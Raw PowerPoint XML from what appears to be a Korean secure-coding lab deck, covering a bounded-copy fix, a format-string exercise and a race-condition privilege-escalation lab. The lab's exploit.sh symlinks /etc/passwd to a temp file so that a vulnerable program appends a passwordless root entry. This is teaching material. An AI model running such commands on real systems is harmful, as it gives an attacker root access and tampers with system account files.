              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1449" t="-234" r="863" b="753"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6308408" y="1284923"/>
            <a:ext cx="4852987" cy="2671762"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="그룹 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D2AEFF-8CF0-49A0-927A-B5C82098C4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EC9A5848-E5CB-43F1-A00B-BA470793D5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F87FF679-B2B6-4EE4-AE91-1C58DA2E10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3211556C-9FC5-43F2-AB3F-012AF3CB22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0801409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취약한 부분 수정</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0" err="1"/>
              <a:t>시큐어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 코딩</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>snprintf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> → </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>strncpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> (buff, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>], sizeof</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(buff));</a:t>
            </a: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r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>6) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>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–o </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmstr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>fmtstring.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> getRoot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>.o</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9515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39">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C5C04B0-1A90-499C-B432-34A9F9351D82}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3"/>
          <a:srcRect l="1424" t="833" r="930" b="605"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="875348"/>
            <a:ext cx="4791076" cy="2643187"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 136">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{065DD0D5-E074-41EA-BCE1-13FD88348094}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="1461" t="13394" r="804" b="69595"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="4093465"/>
            <a:ext cx="4905375" cy="547688"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 141">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92AFE8B1-4B5F-452F-B39E-14DBCF12861B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5"/>
          <a:srcRect l="1797" t="13987" r="271" b="75784"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="511493" y="5147503"/>
            <a:ext cx="4830128" cy="323657"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE8CA100-2841-49EB-8217-4CDEDF3A1B35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3860427977"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6289547" y="475614"/>
          <a:ext cx="5390959" cy="3661855"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="5390959">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="372272330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55433575"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="303657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활성화하면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주소가 실행할 때마다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 변경 없이도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공격의 방어가 일부 가능하다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공격을 성공시킬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2156445"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="69633" name="_x617883232">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39EC40B8-29EC-4CEF-8198-5077B2CA2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691" y="1769617"/>
            <a:ext cx="4656138" cy="2120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437817-B378-4F35-A9EA-71E314E5D783}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6183086" y="4427156"/>
            <a:ext cx="5616792" cy="2061843"/>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1752992D-89AA-4557-8A7E-3CEA4DC34DE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F08279E-FB10-4051-90A5-E67F06C445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5FF1610-51F2-4B72-AB4A-21A27FBCFD8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4A9E8D8-C704-4701-A3CC-FBC68C50E61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5500072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이용하여 권한 상승을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시도하시오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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>통해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다음을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삽입하시오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6" name="그룹 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12538BE9-0F18-4003-8306-155BFA14252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B521C6A-9D1B-4168-9D71-F74E0CB2B84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5531C44-A68F-44A5-A3F3-AE979F4702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DB511F47-AF8A-40A6-A03A-3F2AD77B4E2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278754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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>l 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/sec/createTempFile.</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vim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/sec/createTempFile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 테스트</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>./createTempFile Test</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ cat /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile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err="1"/>
              <a:t>명령행</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t> 인자로 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>넣은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>Test</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>가 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>tmp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/tempfile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일에 추가됨을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/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 작성</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ vim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143">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA5976D8-17E7-43BF-8A40-C0278FA229E8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500380" y="1100666"/>
            <a:ext cx="5135880" cy="541020"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 145">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D4EE6A3-1744-4DB6-B5B7-AB94CC2FEBAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="500380" y="2144606"/>
            <a:ext cx="5400040" cy="2990596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="2" name="표 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65DDACDB-0DED-4220-B383-66DCD44E56F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2109268076"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="500380" y="5200516"/>
          <a:ext cx="4968748" cy="736346"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4968748">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="8226148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72331991"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="437896">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr marL="342900" marR="0" lvl="0" indent="-342900" algn="just" fontAlgn="base" latinLnBrk="1">
                        <a:lnSpc>
                          <a:spcPct val="160000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="0"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
                        <a:buChar char=""/>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0" dirty="0">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작성된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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(remove),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생성</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>(fopen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내용 추가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수행한다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8415954"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Picture 147">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FE5E00B4-9767-417D-9C4B-7708EA208C7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6314440" y="1100666"/>
            <a:ext cx="4594860" cy="807720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 149">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5479E1B6-BC9D-4A77-B2E9-E7F8136EB1CB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId6"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6261100" y="2800520"/>
            <a:ext cx="4877816" cy="2956814"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="그룹 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{50A7A495-4F39-4ADB-A49B-594268D86A0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371771AC-7B5A-4261-A791-EF95D763969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F2EADCBA-1F72-4907-802E-B7190469A5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557721A-FEB9-47FE-AF62-DF8AA5EB0F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917602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a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 권한 부여</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0" err="1"/>
              <a:t>chmod</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t> 755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a:t>.sh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>실행 및 권한 상승을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>통한 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>/passwd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>파일 조작</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>/sec/exploit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" dirty="0"/>
              <a:t>.sh </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="1000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="4" name="표 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0B0495DD-15AA-42C8-99DA-D6EE22C9BA67}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3575144664"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="482536" y="501301"/>
          <a:ext cx="4932807" cy="2443226"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr/>
              <a:tblGrid>
                <a:gridCol w="4932807">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="304647659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492215407"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="1860296">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/sec/createTempFile insertid</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>::0:0:root/root:/bin/bash &amp;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s /etc</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/passwd /</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>tmp</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>/tempfile </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>&amp;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done</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echo </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>"STOP</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>... The passwd file has ben changed</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000"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6073262"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
